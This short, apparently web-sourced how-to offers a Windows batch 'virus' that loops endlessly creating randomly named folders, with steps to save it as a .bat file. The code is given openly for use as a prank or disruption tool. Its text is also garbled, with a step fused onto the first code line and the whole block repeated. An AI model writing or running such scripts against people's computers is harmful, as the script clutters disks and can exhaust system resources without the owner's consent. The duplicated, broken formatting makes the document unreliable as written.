Making A Virus That Makes 1000 Folder In Few Seconds
1.Open Notepad And Type Following Code
@echo off2.Save It As Anyname.bat [its important that you use .bat extension]
:top
md %random%
goto top
@echo off2.Save It As Anyname.bat [its important that you use .bat extension]
:top
md %random%
goto top